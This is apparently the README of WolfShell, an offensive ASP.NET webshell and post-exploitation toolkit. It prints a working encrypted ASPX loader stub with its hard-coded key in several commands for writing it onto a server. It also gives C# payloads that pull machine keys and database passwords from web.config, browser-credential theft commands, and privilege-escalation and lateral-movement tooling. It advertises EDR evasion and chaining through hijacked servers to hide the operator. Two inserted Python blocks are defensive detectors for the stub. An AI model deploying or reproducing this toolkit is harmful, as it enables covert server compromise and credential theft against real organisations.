# Tool List
## 🚀 Core Advantages
* AI-assisted penetration: Supports using natural language to direct an AI that operates the WebShell and executes commands for penetration.
* Efficient and covert communication: Adopts binary stream transmission protocol to ensure high efficiency and concealment of communication.
* End-to-end secure encryption: All transmitted payloads are protected by AES encryption, and a random key is used for each communication to ensure data security.
* Traceless operation: Supports loading and executing code directly in memory, minimizing the risk of leaving traces on the disk and significantly improving operational concealment and security.
* Internal network cascading WebShell control: Through the existing controlled WebShell, without deploying agents or configuring port forwarding, you can connect and control WebShell in a deeper internal network environment.
* Hacking post-penetration: Loads penetration tools into memory through the controlled WebShell, without deploying agents or configuring port forwarding, to achieve convenient and efficient internal network lateral movement.
* Language features: Server (webshell) and payload are all in pure English, and only the provided WebShell variant files contain English, Japanese, and Korean.
## 🔥 Functional Features
* Shell: Supports ASPX, ASHX, ASMX, HTTP, TCP, PS1, EXE, DLL (currently only ASPX, ASHX, and memory shells are available).
* Memory shell: One-click injection of an in-memory webshell from ASPX, reachable at an arbitrary path; the shell address can be changed on each connection, interfering with the blue team's analysis.
* Cmd command execution: Directly executes arbitrary CMD commands on the target system. Modified whoami to prevent EDR recording and alerting.
* File management: Enumerates directory files, creates files, uploads files, executes EXE, renames, deletes, and sets file time on the target system.
* PowerShell execution: Supports executing PowerShell code and commands. Modified whoami to prevent EDR recording and alerting.
* Shellcode execution: Can directly execute native Shellcode in the target environment and bring a Cobalt Strike or Metasploit session online with one click.
* .NET program execution: Supports loading and executing custom .NET assemblies in memory, quickly expanding post-penetration capabilities.
* Memory-loaded scanner: Only need to develop a .NET program for a single IP, and this module can be converted into a memory-loaded C-segment scanner.
* C# code execution: Supports dynamic loading and execution of C# code.
* ValidationKey: Extracts ValidationKey, Validation, DecryptionKey, and other ViewState deserialization information.
* web.config reading: Extracts database connection information (database name, user, password), SMTP/mail server user password, etc.
* Port forwarding: Implements local port mapping to remote internal network hosts, facilitating secure access to internal network services.
* HTTP proxy: One-click memory injection Suo5 high-performance HTTP tunnel proxy tool.
* EfsPotato: Utilizes system service vulnerabilities for privilege escalation.
* BadPotato: Utilizes system service vulnerabilities for privilege escalation.
* Internal network cascading Cmd command execution: Supports cascading internal network level 2 WebShell to execute CMD commands for lateral movement.
* Internal network cascading PowerShell execution: Supports cascading internal network level 2 WebShell to execute PowerShell commands for lateral movement.
* SshCmd: SSH remote command execution tool, supports command execution, file upload and download for internal network hosts to achieve lateral movement.
* MysqlCmd: MySQL database connection tool, supports connecting to internal network MySQL, executing query, import and export, and other database operations.
* MssqlCmd: SQL Server database connection tool, supports connecting to internal network database, executing query, import and export, lateral movement, command execution, Potato privilege escalation, etc.
* SharpWeb: Browser credential capture tool, supports extracting saved Chrome, Firefox, Edge login information and credentials.
* Password reading: IISpwd wifipwd FileZillaPwd firefoxpwd XshellPwd GetPwd FirefoxHistory FirefoxCookie
* Vulnerability detection: MS17010 SMBGhost HikvisionPoc ActivemqPoc Struts2Poc WeblogicPoc CVE-2022-36537 CVE-2024-47176 CVE-2022-27925 CVE-2024-27956
* Lateral movement tools: wshell SmbExec WmiExec WmiExec2 AtExec MssqlCmd MmcExec ShellExec ShellBrowserExec
* AI evasion: Accesses AI artificial intelligence, chatting can evade WebShell.
* Ladon: Internal network penetration toolset, memory loading without file landing, including port scanning, asset detection, password auditing, vulnerability detection, vulnerability exploitation, lateral movement, etc. (Tools are integrated, currently over 10 protocols have been completed, other modules are not yet supported, and some functions may require using the original program)
* AddUser: Bypass antivirus EDR\XDR to add system users, administrators, domain users, domain administrators.
* NoPowerShell: Executes PowerShell commands, code, and files where PowerShell is disabled or not present.
## Auxiliary Functions
### AI Artificial Intelligence
* AI evasion: Accesses AI artificial intelligence, chatting can evade WebShell.
### Encryption and Decryption
* Supported encryption algorithms: BASE64, HEX, ASCII, PowerShell, MD5, SHA1, SHA256, URL encoding
* Supported decryption algorithms: BASE64, HEX, ASCII, PowerShell, URL encoding
## Installation and Use
1. **Download WolfShell**
```bash
git clone https://github.com/0x7556/wolfshell.git
```
2. **Configure Environment**
- Ensure the target environment supports ASPX, ASHX, and has been correctly configured.
3. **Upload WolfShell**
- Upload WolfShell files to the target server, supporting ASPX, ASHX, and memory shells.
- WebShell script: https://github.com/0x7556/wolfshell/tree/main/shell
4. **Access WebShell**
- Connect to the WebShell using the tool client. The default password is WolfShell; a modified password can be generated with WolfHash encryption.
## Usage Environment
- **Operating System:** Windows
- **.NET Version:** .NET Framework 4.8
## Command | Vulnerability GetShell
Where command execution is already available, WolfShell can be written through the following 4 methods.
### PowerShell Write wolf.aspx
```bash
powershell -Command "Set-Content -Path 'wolf.aspx' -Value '<%@ Page Language=\"C#\" %><%if (Request.Cookies.Count != 0) { byte[] k = Encoding.Default.GetBytes(\"ca63457538b9b1e0\"); System.IO.Stream s = Request.InputStream; byte[] c = new byte[s.Length]; s.Read(c, 0, c.Length); System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(\"K\").Equals(this); }%>'"
```
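For defenders, the stub above has a recognisable shape: it reads the raw request body, decrypts it with a hard-coded key that is also passed as the IV, and hands the result to `Assembly.Load`. The following added example (not part of WolfShell or the original page) scans a web root for that combination; the function names and the benign sample are constructed, and `PAGE_STUB` is the stub as printed above.

```python
import re
from pathlib import Path

# Traits of the loader stub shown above. Each is common on its own in
# legitimate code; the combination inside one server-side page is the signal.
TRAITS = {
    "raw_body_read": re.compile(r"Request\s*\.\s*InputStream"),
    "symmetric_decrypt": re.compile(r"\.\s*CreateDecryptor\s*\("),
    "reflective_load": re.compile(r"Assembly\s*\.\s*Load\s*\("),
    "dynamic_instance": re.compile(r"\.\s*CreateInstance\s*\("),
    # Same identifier passed as key and IV, as in CreateDecryptor(k, k).
    "key_reused_as_iv": re.compile(r"CreateDecryptor\s*\(\s*(\w+)\s*,\s*\1\s*\)"),
    "hardcoded_key": re.compile(r'GetBytes\s*\(\s*"[0-9a-fA-F]{16,64}"\s*\)'),
}

def traits_in(text):
    """Return the sorted names of all traits present in a page's source."""
    return sorted(name for name, rx in TRAITS.items() if rx.search(text))

def classify(text):
    """'loader': decrypts the request body and loads it as an assembly.
    'review': reflective loading without the full pattern. Else 'clean'."""
    found = set(traits_in(text))
    if {"raw_body_read", "symmetric_decrypt", "reflective_load"} <= found:
        return "loader"
    if "reflective_load" in found:
        return "review"
    return "clean"

def scan_tree(root, exts=(".aspx", ".ashx", ".asmx")):
    """Walk a web root and report every page that is not 'clean'."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in exts:
            text = path.read_text(encoding="utf-8", errors="replace")
            verdict = classify(text)
            if verdict != "clean":
                hits.append((path.name, verdict, traits_in(text)))
    return hits

# The stub exactly as it appears on this page (used only as scanner input).
PAGE_STUB = (
    '<%@ Page Language="C#" %><%if (Request.Cookies.Count != 0) { '
    'byte[] k = Encoding.Default.GetBytes("ca63457538b9b1e0"); '
    'System.IO.Stream s = Request.InputStream; byte[] c = new byte[s.Length]; '
    's.Read(c, 0, c.Length); System.Reflection.Assembly.Load('
    'new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k)'
    '.TransformFinalBlock(c, 0, c.Length)).CreateInstance("K").Equals(this); }%>'
)
# Constructed benign page: reads the request body but loads no code.
BENIGN_PAGE = (
    '<%@ Page Language="C#" %><% var body = new System.IO.StreamReader('
    'Request.InputStream).ReadToEnd(); Response.Write(body.Length); %>'
)
```

File scanning only finds stubs written to disk; the in-memory variants this page describes leave no page to scan, so pair it with process and request telemetry.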
### PowerShell Command Base64 Write wolf.aspx
```bash
powershell -EncodedCommand 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
```
### Cmd Command Echo & Certutil Write wolf.aspx
```bash
echo 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 > w.hex && certutil -f -decodehex w.hex wolf.aspx && del w.hex
```
### Cmd Command Echo Write wolf.aspx
```bash
echo ^<%@ Page Language="C#" %^> > wolf.aspx && echo ^<% if (Request.Cookies.Count != 0) { >> wolf.aspx && echo byte[] k = Encoding.Default.GetBytes("ca63457538b9b1e0"); >> wolf.aspx && echo System.IO.Stream s = Request.InputStream; >> wolf.aspx && echo byte[] c = new byte[s.Length]; >> wolf.aspx && echo s.Read(c, 0, c.Length); >> wolf.aspx && echo System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("K").Equals(this); >> wolf.aspx && echo } %^> >> wolf.aspx
```
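All four write methods above surface in process-creation telemetry as PowerShell, `cmd` or `certutil` producing a server-executable page. This added example (not from the original page or the project) matches those command lines and also decodes `-EncodedCommand` arguments before matching; the event fields `host`, `parent` and `cmdline`, the rule names and the sample events are assumptions constructed for illustration.

```python
import base64
import binascii
import re

WEB_EXT = r"\.(?:aspx|ashx|asmx)\b"
RULES = [
    ("ps_write_web_page",
     re.compile(r"\b(?:Set-Content|Add-Content|Out-File)\b.*" + WEB_EXT, re.I)),
    ("certutil_decode_web_page",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-decode(?:hex)?\b.*" + WEB_EXT, re.I)),
    ("echo_redirect_web_page",
     re.compile(r"\becho\b.*>{1,2}\s*\S*" + WEB_EXT, re.I)),
]
# PowerShell accepts -e, -en, -enc ... as prefixes of -EncodedCommand.
ENCODED = re.compile(r"-e(?:n(?:c\w*)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", "replace")
    except (binascii.Error, ValueError):
        return None

def match_rules(cmdline):
    """Apply every rule to the command line and to any decoded payload."""
    texts = [cmdline, decode_encoded_command(cmdline) or ""]
    return sorted({name for name, rx in RULES for t in texts if rx.search(t)})

def triage(host, parent, cmdline):
    """Return an alert dict for one process-creation event, or None."""
    rules = match_rules(cmdline)
    if not rules:
        return None
    # A web worker spawning the writer means the write came through the site.
    from_iis = parent.lower().endswith("w3wp.exe")
    return {"host": host, "rules": rules, "severity": "high" if from_iis else "medium"}

W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"
SCRIPT = "Set-Content -Path 'probe.aspx' -Value 'x'"  # harmless constructed payload
ENC_ARG = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
EVENTS = [  # constructed (host, parent image, command line) samples
    ("web01", W3WP, "powershell -Command \"Set-Content -Path 'wolf.aspx' -Value 'x'\""),
    ("web01", W3WP, "cmd /c echo 3c25 > w.hex && certutil -f -decodehex w.hex wolf.aspx"),
    ("web02", r"C:\Windows\explorer.exe", "cmd /c echo ^<%@ Page %^> > wolf.aspx"),
    ("web01", W3WP, "powershell -EncodedCommand " + ENC_ARG),
    ("web03", r"C:\Windows\System32\services.exe",
     "powershell -ExecutionPolicy Bypass -File backup.ps1"),
]

def run(events=EVENTS):
    """Triage every sample event; None means no rule fired."""
    return [triage(*e) for e in events]
```

Map `parent` and `cmdline` to your telemetry's own field names, such as ParentImage and CommandLine in Sysmon Event ID 1.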
## Function Examples
### Custom .NET Program Execution
.NET program execution: Supports loading and executing custom .NET assemblies in memory, quickly expanding post-penetration capabilities.

### AI Artificial Intelligence
Using AI to evade WolfShell WebShell service

### Cascading Internal Network Level 3 WebShell Execute Cmd Command
From the entry point 192.168.50.106, cascade to 192.168.50.159 on the internal network, then cascade again to the next-level internal network WebShell at 192.168.50.69 and execute commands.
PS: Of course, you can also cascade to external networks, such as grabbing some servers as jumpers, and the real target is at level 3, making it difficult to track or trace back to your real IP.

### Cascading Internal Network Level 2 WebShell Execute Cmd Command
From the entry point 192.168.50.159, cascade to the internal network WebShell at 192.168.50.106 and execute commands.

### WebShell Entry Point Execute Cmd Command

### WebShell Entry Point Execute PowerShell Command/Code
* whoami is implemented in code and does not call the system whoami
* Supports command execution and code execution up to 9K in length
* Entering info or ver shows the operating system version, bitness, .NET version, and PowerShell version
* Entering whoami or username is automatically converted to the corresponding PowerShell code to view user information
* Base64-encoded code execution, for example base64:ZWNobyBXb2xmU2hlbGw=
```text
PS C:\Users\admin>whoami
whoami: IIS APPPOOL\DefaultAppPool
Username: WIN-021V7TK43N5$
PS C:\Users\admin>info
Operating System Version: Microsoft Windows Server 2019 Datacenter 64 bit
Version Number: 10.0.17763
PowerShell Version:
5.1.17763.1
.NET Detailed Versions:
PSChildName Version Release
----------- ------- -------
Client 4.7.03190 461814
PS C:\Users\admin>base64:ZWNobyBXb2xmU2hlbGw=
WolfShell
PS C:\Users\admin>Write-Host "Current User:`n$env:USERNAME"
Current User:
WIN-021V7TK43N5$
```

### File Management

### C# Code Execution

#### Obtaining ValidationKey Example Code
* ValidationKey: Extracts ViewState deserialization information such as ValidationKey, Validation, and DecryptionKey.
```csharp
using System;
using System.Reflection;
using System.Web.Configuration;

public class Eval
{
    public string eval(Object obj)
    {
        var sy = Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic);
        var cg = (MachineKeySection)gac.Invoke(null, new object[0]);
        return "ValidationKey: " + cg.ValidationKey + " | " + "Validation: " + cg.Validation + " | " + "DecryptionKey: " + cg.DecryptionKey + " | " + "Decryption: " + cg.Decryption + " | " + "CompatibilityMode: " + cg.CompatibilityMode;
    }
}
```

#### Scanning C-segment alive hosts Example Code
```csharp
using System;
using System.Net;
using System.Net.NetworkInformation;
using System.Text;
using System.Threading.Tasks;

public class Eval
{
    public string eval(Object obj)
    {
        StringBuilder iplist = new StringBuilder();
        string baseIP = "192.168.1.";
        PingOptions options = new PingOptions();
        options.DontFragment = true;
        var tasks = new Task[254];
        for (int i = 1; i < 255; i++)
        {
            int ipSuffix = i;
            tasks[i - 1] = Task.Run(() =>
            {
                using (Ping myPing = new Ping())
                {
                    PingReply reply = myPing.Send(baseIP + ipSuffix, 120);
                    if (reply.Status == IPStatus.Success)
                    {
                        lock (iplist)
                        {
                            iplist.AppendLine("Alive IP: " + reply.Address.ToString());
                        }
                    }
                }
            });
        }
        Task.WaitAll(tasks);
        return iplist.ToString();
    }
}
```

#### CMD Command Execution Example Code
```csharp
using System;
using System.Diagnostics;

public class Eval
{
    public string eval(Object obj)
    {
        try
        {
            Process process = new Process();
            process.StartInfo.FileName = "cmd.exe";
            process.StartInfo.Arguments = "/c whoami";
            process.StartInfo.UseShellExecute = false;
            process.StartInfo.RedirectStandardOutput = true;
            process.Start();
            string result = process.StandardOutput.ReadToEnd();
            process.WaitForExit();
            return result;
        }
        catch (Exception ex)
        {
            return "Error occurred: " + ex.Message;
        }
    }
}
```

#### Obtaining web.config Password Example Code
* web.config reading: Extracts database connection information (database name, user, password), SMTP/mail server user password, etc.
```csharp
using System;
using System.Configuration;
using System.Text;

public class Eval
{
    public string eval(Object obj)
    {
        try
        {
            var connectionStrings = ConfigurationManager.ConnectionStrings;
            var appSettings = ConfigurationManager.AppSettings;
            var result = new StringBuilder();
            foreach (ConnectionStringSettings connectionString in connectionStrings)
            {
                result.AppendLine("Connection string name: " + connectionString.Name);
                result.AppendLine("Connection string value: " + connectionString.ConnectionString);
                result.AppendLine();
            }
            result.AppendLine();
            foreach (string key in appSettings.AllKeys)
            {
                result.AppendLine("Key: " + key + ", Value: " + appSettings[key]);
            }
            return result.ToString();
        }
        catch (Exception ex)
        {
            return "Error occurred: " + ex.Message;
        }
    }
}
```

### Encryption and Decryption Algorithms
Supports encryption algorithms: BASE64, HEX, ASCII, PowerShell, MD5, SHA1, SHA256, URL encoding
Supports decryption algorithms: BASE64, HEX, ASCII, PowerShell, URL encoding
#### WolfHash Password

#### ASCII Code Encryption

#### BASE64 Decryption

#### HEX Hexadecimal Decryption

### Potato Privilege Escalation Example
#### efspotato Privilege Escalation

#### badpotato Privilege Escalation

### Internal Network Scanning Example

### Port Forwarding Example

### HTTP Proxy Example

## Hacking Post-Exploitation
### SSH Remote Command Execution Example
```bash
Usage:
sshcmd 192.168.50.128 22 root toor id
sshcmd 192.168.50.128 22 root toor download /tmp/down.rar c:\down.rar
sshcmd 192.168.50.128 22 root toor upload c:\upload.rar /tmp/upload.rar
Keybord
sshcmd 192.168.50.128 22 root toor download2 /tmp/down.rar c:\down.rar
sshcmd 192.168.50.128 22 root toor upload2 c:\upload.rar /tmp/upload.rar
```

### MySQL Database Connection Example
```bash
mysqlcmd host port user pass dbname sqlstr
mysqlcmd host port user pass dbname sqlb64
Demo:
mysqlcmd 192.168.50.139 3306 root WolfShell mysql info
mysqlcmd 192.168.50.139 3306 root WolfShell mysql ""SELECT VERSION(); ""
mysqlcmd 192.168.50.139 3306 root WolfShell mysql ""SELECT 3+5 ""
mysqlcmd 192.168.50.139 3306 root WolfShell mysql c2VsZWN0IDMrNQ==";
```

### Reading Browser Passwords Example
* SharpWeb: A browser credential extraction tool that supports extracting saved Chrome, Firefox, Edge login information and credentials.
```bash
Usage:
SharWeb arg0 [arg1 arg2 ...]
Arguments:
all - Retrieve all Chrome, FireFox and IE/Edge credentials.
full - The same as 'all'
chrome - Fetch saved Chrome logins. e.g. -d Directory
firefox - Fetch saved FireFox logins. e.g. -p masterkey -d Directory
edge - Fetch saved Internet Explorer/Microsoft Edge logins.
Demo:
SharWeb all
SharWeb chrome
SharWeb chrome -d C:\Output
SharWeb firefox -p mymasterkey -d C:\Output
SharWeb edge
=======================================================================
```

### Ladon Internal Network Penetration Tool Example
```bash
Usage:
Ladon whoami
Ladon 192.168.50.159/24 ICMP ICMP alive host detection
Ladon 192.168.50.159/24 PortScan Open port service scanning
Ladon 192.168.50.159/24 WebScan Website title, middleware
Ladon 192.168.50.159/24 SmbInfo SMB alive host detection, NTLM system information
Ladon 192.168.50.159/24 NbtInfo NBT alive host detection, NTLM system information
Ladon 192.168.50.159/24 WmiInfo WMI alive host detection, NTLM system information
Ladon 192.168.50.159/24 LdapInfo LDAP alive host detection, NTLM system information
Ladon 192.168.50.159/24 RdpInfo RDP alive host detection, NTLM system information
Ladon 192.168.50.159/24 SmtpInfo SMTP alive host detection, NTLM system information
Ladon 192.168.50.159/24 HttpInfo HTTP alive host detection, NTLM system information
Ladon 192.168.50.159/24 WinrmInfo Winrm alive host detection, NTLM system information
Ladon 192.168.50.159/24 MssqlInfo SQL database host detection, NTLM system information
Ladon 192.168.50.159/24 FtpInfo FTP alive host detection
Ladon 192.168.50.159/24 T3Info Weblogic protocol detection
Ladon 192.168.50.159/24 CiscoInfo Cisco router detection
Ladon 192.168.50.159/24 SnmpInfo SNMP device detection, such as routers, switches, etc.
Ladon 192.168.50.159/24 OxidInfo Windows multi-network card host detection
Ladon 192.168.50.159/24 EthInfo Windows multi-network card host detection
Ladon http://0x7556.org WPinfo WordPress version, plugin detection, vulnerability
Ladon 192.168.50.159/24 DnsInfo DNS alive host detection, domain recognition
```
#### SMB Protocol NTLM Information OS Operating System Identification

#### WebScan Website Title, Middleware Scanning

### Port Scanning Example
```bash
PortScan 192.168.50.159
PortScan 192.168.50.159 80,22,135,445
```

## MS17010 Vulnerability Detection

## SQL Server Lateral Movement Database Privilege Escalation

## Xshell Password Reading

## webkey Password Reading
Parsing web.config to obtain ValidationKey (ViewState deserialization Exchange, SharePoint backdoor)

## CVE-2025-55182 Next.js Rce Vulnerability Exploitation
[+]CVE-2025-55182 CVE-2025-55182 Next.js Rce vulnerability exploitation
[+]NextJSexp CVE-2025-55182 Next.js Rce vulnerability exploitation

## Memory Loading Internal Network Scanner
### Memory Loading Scanner
* Only develop a .NET program for a single IP, and use this module to transform it into a memory-loaded C-segment scanner.
* If you only need to implement detection, vulnerability exploitation, etc. for one IP, note that the class and method must be public.
#### Custom Tool Original Usage
```bash
F:\py>urltitle.exe 192.168.50.1
URL: http://192.168.50.1/ | Status: 200 | Banner: httpd/2.0 | Title: No Title
```
#### Remote Memory Loading Becomes Internal Network C-Segment Scanner
Usage:
1. Drag the target EXE to the "ExePath" file path input box.
2. Fill in the C-segment input box with the network segment to be scanned (e.g., 192.168.1.0/24).
3. Click the "Scan" button to start scanning. The scanning behavior and results are determined by the loaded EXE functionality.
Explanation:
- The loader first uses ICMP (ping) to probe each target for liveness; the custom EXE is loaded and executed only for hosts that are alive.
- If the target network disables ICMP response, please uncheck the "Prior probe/ICMP" option to skip the detection step.

#### Memory Loading Scanner Built-in MS17010 Vulnerability Detection

## Disclaimer
- When using WolfShell, please follow relevant laws and regulations and ensure that you are testing and using it in an authorized environment.
- This tool is only for educational and research purposes. Any abuse will be the responsibility of the user.
## Feedback
Welcome any form of contribution! Please submit issues, suggestions, or pull requests.
## License
This project uses the MIT license. For details, see the [LICENSE](LICENSE) file.
## Resource Links
Tools that are integrated or to be integrated, using memory loading. Some tools still have unresolved compatibility issues (for example SweetPotato\GodPotato, which may need to be uploaded to the target and executed in cmd).
* Ladon (internal network penetration framework): https://github.com/k8gege/Ladon (very rich functionality, under research)
* gpt4free (AI free API): https://github.com/xtekky/gpt4free
* SharpWeb (browser password reading): https://github.com/djhohnstein/SharpWeb
* suo5 proxy (HTTP tunnel proxy): https://github.com/zema1/suo5
* BadPotato (privilege escalation tool): https://github.com/BeichenDream/BadPotato
* EfsPotato (privilege escalation tool): https://github.com/zcgonvh/EfsPotato
* CVE-2025-59287 vulnerability .net deserialization memory forward horse: https://github.com/0x7556/CVE-2025-59287
## Follow
* Welcome to follow the public account and Github. Your follow, like, and feedback will be the driving force for software updates!
